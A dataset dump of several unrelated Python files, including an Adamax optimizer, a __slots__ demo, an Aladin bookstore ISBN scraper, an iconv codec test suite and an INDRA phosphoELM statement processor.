Compared to the version in PyTorch, this version implements a fix for weight decay.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 2e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
bias_correction (bool, optional): enable bias correction (default: True)
__ https://arxiv.org/abs/1412.6980
"""
def __init__(self, params, lr=2e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, bias_correction=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= weight_decay:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay,
bias_correction=bias_correction)
super(Adamax, self).__init__(params, defaults)
@property
def supports_memory_efficient_fp16(self):
return True
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Adamax does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_inf'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_inf'] = state['exp_inf'].type_as(p_data_fp32)
exp_avg, exp_inf = state['exp_avg'], state['exp_inf']
beta1, beta2 = group['betas']
eps = group['eps']
state['step'] += 1
# Update biased first moment estimate.
exp_avg.mul_(beta1).add_(1 - beta1, grad)
# Update the exponentially weighted infinity norm.
torch.max(
exp_inf.mul_(beta2),
grad.abs_(),
out=exp_inf,
)
step_size = group['lr']
if group['bias_correction']:
bias_correction = 1 - beta1 ** state['step']
step_size /= bias_correction
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
p_data_fp32.addcdiv_(-step_size, exp_avg, exp_inf.add(eps))
p.data.copy_(p_data_fp32)
return loss
| Python | 0 | |
a4924a6928facdda942844b1bac8f0a53eb9ff4b | add 1 OPP file: slots | use_slots.py | use_slots.py | #!/user/bin/env python3
# -*- coding: utf-8 -*-
class Student(object):
_slots_ = ('name', 'age')
class GraduateStudent(Student):
pass
s = Student()
s.name = 'Michael'
s.age = 15
try:
s.score = 88
except AttributeError as e:
print('AttributeError:', e)
g = GraduateStudent()
g.score = 99
print(g.score)
| Python | 0 | |
b6b2f268693764deb70553b00904af4aa6def15f | add lamp_genie.py - aladin 오프라인 매장을 검색해서 키워드의 책 ISBN번호를 알려준다. | lamp_genie.py | lamp_genie.py | #-*- coding: utf-8 -*-
import requests
import BeautifulSoup
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
mobile_site_url = "http://www.aladin.co.kr"
search_url = "http://off.aladin.co.kr/usedstore/wsearchresult.aspx?SearchWord=%s&x=0&y=0"
book_url = "http://off.aladin.co.kr/usedstore/wproduct.aspx?ISBN=%d"
response = requests.get(mobile_site_url + '/m/off/gate.aspx?')
content = response.content
search_text = requests.utils.quote(raw_input("검색할 책 제목이나 글쓴이 : ").encode('cp949'))
shop_list = BeautifulSoup.BeautifulSoup(content).findAll('td')
s = requests.Session()
for x in shop_list:
print "=" * 50
try:
shop_location = x.text
url = x.find('a')
response = s.get(mobile_site_url + url['href'])
url = search_url % search_text
print url
response = s.get(url)
content = response.content
result = BeautifulSoup.BeautifulSoup(content).find('div', {'id':'Search3_Result'})
try:
result_list = set()
for x in result.findAll('a'):
search_code = str(x).split('ISBN=')
if search_code.__len__() > 1:
isbn = search_code[1].split('"')[0]
result_list.add(isbn)
print shop_location, result_list
except:
print set()
except Exception as e:
pass
| Python | 0 | |
13c14b8c2b44d2f9b39e46d395fcde891ba6ba9f | Patch #670715: Universal Unicode Codec for POSIX iconv. | Lib/test/test_iconv_codecs.py | Lib/test/test_iconv_codecs.py | from test import test_support
import unittest, sys
import codecs, _iconv_codec
from encodings import iconv_codec
from StringIO import StringIO
class IconvCodecTest(unittest.TestCase):
if sys.byteorder == 'big':
spam = '\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'
else:
spam = 's\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
def test_sane(self):
self.encoder, self.decoder, self.reader, self.writer = \
codecs.lookup(_iconv_codec.internal_encoding)
self.assertEqual(self.decoder(self.spam), (u'spamspam', 16))
self.assertEqual(self.encoder(u'spamspam'), (self.spam, 8))
self.assertEqual(self.reader(StringIO(self.spam)).read(), u'spamspam')
f = StringIO()
self.writer(f).write(u'spamspam')
self.assertEqual(f.getvalue(), self.spam)
def test_basic_errors(self):
self.encoder, self.decoder, self.reader, self.writer = \
iconv_codec.lookup("ascii")
def testencerror(errors):
return self.encoder(u'sp\ufffdam', errors)
def testdecerror(errors):
return self.decoder('sp\xffam', errors)
self.assertRaises(UnicodeEncodeError, testencerror, 'strict')
self.assertRaises(UnicodeDecodeError, testdecerror, 'strict')
self.assertEqual(testencerror('replace'), ('sp?am', 5))
self.assertEqual(testdecerror('replace'), (u'sp\ufffdam', 5))
self.assertEqual(testencerror('ignore'), ('spam', 5))
self.assertEqual(testdecerror('ignore'), (u'spam', 5))
def test_pep293_errors(self):
self.encoder, self.decoder, self.reader, self.writer = \
iconv_codec.lookup("ascii")
def testencerror(errors):
return self.encoder(u'sp\ufffdam', errors)
def testdecerror(errors):
return self.decoder('sp\xffam', errors)
self.assertEqual(testencerror('xmlcharrefreplace'),
('sp�am', 5))
self.assertEqual(testencerror('backslashreplace'),
('sp\\ufffdam', 5))
def error_bomb(exc):
return (u'*'*40, len(exc.object))
def error_mock(exc):
error_mock.lastexc = exc
return (unicode(exc.object[exc.start - 1]), exc.end)
codecs.register_error('test_iconv_codec.bomb', error_bomb)
codecs.register_error('test_iconv_codec.mock', error_mock)
self.assertEqual(testencerror('test_iconv_codec.bomb'),
('sp' + ('*'*40), 5))
self.assertEqual(testdecerror('test_iconv_codec.bomb'),
(u'sp' + (u'*'*40), 5))
self.assertEqual(testencerror('test_iconv_codec.mock'), ('sppam', 5))
exc = error_mock.lastexc
self.assertEqual(exc.object, u'sp\ufffdam')
self.assertEqual(exc.start, 2)
self.assertEqual(exc.end, 3)
self.assert_(isinstance(exc, UnicodeEncodeError))
self.assertEqual(testdecerror('test_iconv_codec.mock'), (u'sppam', 5))
exc = error_mock.lastexc
self.assertEqual(exc.object, 'sp\xffam')
self.assertEqual(exc.start, 2)
self.assertEqual(exc.end, 3)
self.assert_(isinstance(exc, UnicodeDecodeError))
def test_empty_escape_decode(self):
self.encoder, self.decoder, self.reader, self.writer = \
iconv_codec.lookup("ascii")
self.assertEquals(self.decoder(u""), ("", 0))
self.assertEquals(self.encoder(""), (u"", 0))
def test_main():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(IconvCodecTest))
test_support.run_suite(suite)
if __name__ == "__main__":
test_main()
# ex: ts=8 sts=4 et
| Python | 0 | |
a3afcb81b2aec2043576aa87cdeba266b4576b2c | Add processor | indra/sources/phosphoELM/processor.py | indra/sources/phosphoELM/processor.py | import requests
import logging
from indra.statements import Phosphorylation, Evidence, Agent
from indra.preassembler.grounding_mapper import GroundingMapper
gilda_url = 'http://grounding.indra.bio/ground'
logger = logging.getLogger(__file__)
def _gilda_grounder(entity_str):
# If match found, return the string that provided the match
res = requests.post(gilda_url, json={'text': entity_str})
if res.status_code == 200 and res.json():
db_ns = res.json()[0]['term']['db']
db_id = res.json()[0]['term']['id']
return entity_str, db_ns, db_id
else:
if res.status_code != 200:
logger.warning('Gilda service responded with status code %d' %
res.status_code)
return entity_str, None, None
class PhosphoELMPRocessor(object):
def __init__(self, file_dump_json=None):
self.statements = []
self.statements.extend(self._from_file_dump_json(file_dump_json))
def _from_file_dump_json(self, fd_json, keep_empty=False,
non_human=False):
"""Structuring the json entry to Phosphorylation statements
fd_json : list(json)
JSON comatible list of entries
keep_empty : bool
If true, also create statements when upstream kinases
(in entry['kinases']) are not known.
non_human : bool|str|list(str)
If true, use all entries regardless of species. If a string or
list of strings, also use the species provided in the list.
Homo sapiens is always used.
Returns
-------
"""
if fd_json is None:
return []
statements = []
for entry in fd_json:
if not keep_empty and not entry['kinases'] or not non_human \
and not entry['species'].lower() == 'homo sapiens':
# Skip entries without any kinases or if species is other
# than human when 'use_non_human' is False.
continue
# Entries:
# 'acc': '<UP ID>', <-- substrate
# 'sequence': '<protein sequence>',
# 'position': '<position>',
# 'code': '<phosphorylated residue>',
# 'pmids': '<pmid>',
# 'kinases': '<responsible kinase>', <-- enzyme
# 'source': 'HTP|LTP',
# 'species': '<species name in latin>',
# 'entry_date': 'yyyy-mm-dd HH:MM:SS.mmmmmm'
substrate = Agent(None, db_refs={'UP': entry['acc']})
used_name, enz = self._get_enzyme(entry['kinases'])
GroundingMapper.standardize_agent_name(substrate)
GroundingMapper.standardize_agent_name(enz)
evidence = Evidence(annotations={
'data_source': 'High-ThroughPut' if
entry['source'].lower == 'htp' else 'Low-ThroughPut',
'phosphoelm_substrate': entry['acc'],
'phosphoelm_kinase': entry.get('kinases', 'unknown')
})
statements.append(Phosphorylation(
enz=enz,
sub=substrate,
residue=entry['code'],
position=entry['position'],
evidence=evidence)
)
return statements
@staticmethod
def _get_enzyme(upstream_kinase):
"""Handle the upstream kinases
Parameters
----------
upstream_kinase : str
The string occuring in the entry 'upstream_kinases'
Returns
-------
kinases : indra.statements.Agent
The agents contained in 'upstream_kinases'
"""
strip_words = ['_group', 'kinase', '_drome', '_Caeel']
# Pre process: strip 'strip words' and any trailing space
for word in strip_words:
upstream_kinase = upstream_kinase.replace(word, '').rstrip()
used_str, ns, id = _gilda_grounder(upstream_kinase)
# Split on '_'
if ns is None and id is None and '_' in used_str:
used_str, suffix = used_str.split('_')
used_str, ns, id = _gilda_grounder(used_str)
# Split on '/'
if ns is None and id is None and '/' in used_str:
used_str = used_str.split('/')[0]
used_str, ns, id = _gilda_grounder(used_str)
if ns is None and id is None:
ns = 'TEXT'
id = used_str
ag = Agent(None, db_refs={ns: id})
return used_str, ag
# def _seq_mapping(self, sequence, position, residue, species):
# pass
| Python | 0.000019 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.